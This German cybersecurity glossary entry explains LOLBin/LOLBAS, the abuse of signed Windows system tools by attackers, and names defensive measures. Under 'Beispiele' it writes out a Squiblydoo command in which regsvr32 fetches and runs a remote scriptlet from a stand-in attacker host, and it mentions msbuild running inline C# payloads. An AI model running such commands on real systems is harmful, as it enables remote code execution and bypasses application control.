Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 632

LOLBin / LOLBAS

Was ist LOLBin / LOLBAS?

LOLBin / LOLBASSigniertes Systembinary oder Skript (LOLBin/LOLBAS), das Angreifer fuer Ausfuehrung, Download, Persistenz oder Umgehung von Schutzmechanismen missbrauchen, waehrend es wie ein legitimes Admin-Tool aussieht.


LOLBin (Living-Off-the-Land Binary) und das umfassendere LOLBAS-Projekt (Living-Off-the-Land Binaries And Scripts) katalogisieren von Microsoft signierte Binaries, Skripte und Bibliotheken, deren Nebenwirkungen sich offensiv nutzen lassen, etwa zum Ausfuehren beliebigen Codes, Nachladen von Payloads oder Umgehen von Application Control. Typische Beispiele sind rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe und certutil.exe. Da diese Tools signiert und vertrauenswuerdig sind, hilft Hash-Blocklisting nicht; man muss erwartete von anomalen Kommandozeilen unterscheiden. LOLBAS untermauert viele Execution- und Defense-Evasion-Techniken in MITRE ATT&CK. Schutz: Application Allowlisting, ScriptBlock- und Prozess-Logging, ASR-Regeln, EDR-Verhaltensanalyse.

Beispiele

  1. 01

    regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).

  2. 02

    msbuild.exe payload.xml fuer inline C# ohne Festplatten-Drop.

Häufige Fragen

Was ist LOLBin / LOLBAS?

Signiertes Systembinary oder Skript (LOLBin/LOLBAS), das Angreifer fuer Ausfuehrung, Download, Persistenz oder Umgehung von Schutzmechanismen missbrauchen, waehrend es wie ein legitimes Admin-Tool aussieht. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.

Was bedeutet LOLBin / LOLBAS?

Signiertes Systembinary oder Skript (LOLBin/LOLBAS), das Angreifer fuer Ausfuehrung, Download, Persistenz oder Umgehung von Schutzmechanismen missbrauchen, waehrend es wie ein legitimes Admin-Tool aussieht.

Wie funktioniert LOLBin / LOLBAS?

LOLBin (Living-Off-the-Land Binary) und das umfassendere LOLBAS-Projekt (Living-Off-the-Land Binaries And Scripts) katalogisieren von Microsoft signierte Binaries, Skripte und Bibliotheken, deren Nebenwirkungen sich offensiv nutzen lassen, etwa zum Ausfuehren beliebigen Codes, Nachladen von Payloads oder Umgehen von Application Control. Typische Beispiele sind rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe und certutil.exe. Da diese Tools signiert und vertrauenswuerdig sind, hilft Hash-Blocklisting nicht; man muss erwartete von anomalen Kommandozeilen unterscheiden. LOLBAS untermauert viele Execution- und Defense-Evasion-Techniken in MITRE ATT&CK. Schutz: Application Allowlisting, ScriptBlock- und Prozess-Logging, ASR-Regeln, EDR-Verhaltensanalyse.

Wie schützt man sich gegen LOLBin / LOLBAS?

Schutzmaßnahmen gegen LOLBin / LOLBAS kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.

Welche anderen Bezeichnungen gibt es für LOLBin / LOLBAS?

Übliche alternative Bezeichnungen: LOLBAS, Living-off-the-Land-Binary.

Verwandte Begriffe